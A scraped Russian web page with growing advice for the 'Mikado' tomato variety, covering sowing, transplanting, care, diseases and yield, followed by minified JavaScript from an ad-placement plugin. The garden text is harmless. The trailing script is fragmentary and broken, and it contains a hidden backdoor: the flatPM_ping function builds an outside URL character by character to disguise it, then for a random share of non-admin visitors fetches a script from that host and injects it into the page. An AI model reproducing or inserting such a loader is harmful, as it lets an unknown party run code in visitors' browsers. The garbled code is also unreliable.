  • Далее замачивают в течение 5 часов в растворе древесной золы (1 ст. л. золы растворить в литре теплой воды, оставить настаиваться на сутки).

Посев семенного материала

Рекомендации по посеву семенного материала:

  • Оптимальный температурный режим, чтобы растение нормально развивалось, от +20 до +25 ºС. Низкие температуры (ниже +15 ºС) способствуют прекращению роста растений, высокие (больше +35 ºС) — препятствуют образованию завязей;
  • Высевают семенной материал на рассаду за два месяца до планируемой высадки растений на постоянное место;
  • Грунт используют как покупной, так и самостоятельно приготовленный. Однако с учетом того, что для томатов необходимы легкие почвы, в составе которых обязательно наличие торфа, перегноя, коровяка, песка либо опилок;
  • Для высевания семян используют лотки, специальные кассеты, и обеспечивают рассаду хорошим дренажом;
  • При появлении двух настоящих листочков необходимо провести пикирование для получения качественной рассады. Молоденькие, самые крепкие саженцы пересаживают в отдельные ёмкости, проводя прищипку центрального корня, чтобы образовывались боковые корешки и укреплялась корневая система.

Отзыв огородника:

Правила высадки рассады

Как правильно высадить рассаду:

  • За 7 дней до высадки рекомендована обработка рассады бордосской жидкостью;
  • Также саженцы начинают закалять, вынося их на открытый воздух;
  • Рассаду можно высаживать после формирования 6-7 настоящих листочков;
  • Проводят предпосадочное проливание лунок слабым марганцовым раствором;
  • У молодого саженца нужно удалить несколько нижних листочков, оставив 3-4 отлично сформировавшихся;
  • Заглубляют в грунт и часть стебля, оставив над поверхностью лишь листочки.

Существующие варианты размещения:

  • Схема высадки 50х50 см (2-3 куста на 1 м 2 ), для обеспечения хорошего проветривания;
  • При выращивании томатов в один стебель, интервал между кустами уменьшают до 18-20 см, а ширину междурядья делают от 100 до 120 см.

Уход за кустами

Основные мероприятия по уходу за культурой:

  • Проведение пасынкования в процессе выращивания позволит предотвратить загущенность и получить неплохой урожай. Во время формирования куста в два стебля нужно оставить один пасынок перед первой цветочной кистью, а все остальные удалить. Процедура пасынкования необходима раз в неделю;
  • Поливать томаты желательно вечером, избегая попадания воды на стебель и листья. Частота поливов обусловлена погодными условиями — 1-2 раза в неделю. Во время активного роста и формировании завязей поливать обильно, а в период созревания плодов осуществляют минимальный полив, чтобы избежать растрескивания, а также сохранить вкусовые характеристики плодов;
  • Регулярно подкармливать, используя органические и минеральные удобрения. В основном удобряют 3-4 раза за сезон. Первую подкормку проводят спустя 10-12 дней после высадки саженцев. Остальные во время цветения, появления завязей и созревания плодов.

Болезни и вредители

Несмотря на наличие хорошего иммунитета сорт «Микадо» подвержен некоторым заболеваниям:

  • Фитофтороз. Чаще встречается в тепличных сооружениях. Предотвратить его поможет контроль уровня влажности и регулярное проветривание;
  • Сухая пятнистость. В борьбе с ней эффективно применение препаратов «Антракол», «Консенто» и «Татту»;
  • С медведкой отлично борется препарат «Гном».

Урожайность

Урожай томатный сорт «Микадо» дает не высокий, что соответственно относится к минусам сорта. При соблюдении надлежащего ухода урожай с 1 м 2 составляет 6-7 кг томатов. Для увеличения урожайности культуру необходимо регулярно подкармливать комплексными удобрениями.

В каких регионах лучше выращивать?

Для культивирования рекомендованы все регионы, кроме районов крайнего севера и Сибири. В регионах с холодным климатов для выращивания лучше использовать теплицы, в южных районах — открытый грунт.

Отзывы о сорте от тех, кто выращивал

Большинство огородников положительно отзываются о томатном сорте «Микадо», отмечая большую плодородность, отличную всхожесть и прекрасные вкусовые характеристики. Однако поскольку у плодов достаточно нежная мякоть, иногда во время засолки происходит изменение вкусовых качеств томатов, что некоторые специалисты относят к минусам данного сорта.

Томат «Микадо» является отличным сортом, который годами проверен многими овощеводами. За ним несложно ухаживать, и под силу вырастить и опытным и начинающим огородникам. Соблюдение описанных выше рекомендаций по выращиванию и дальнейшему уходу позволит получить отличный томатный урожай.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};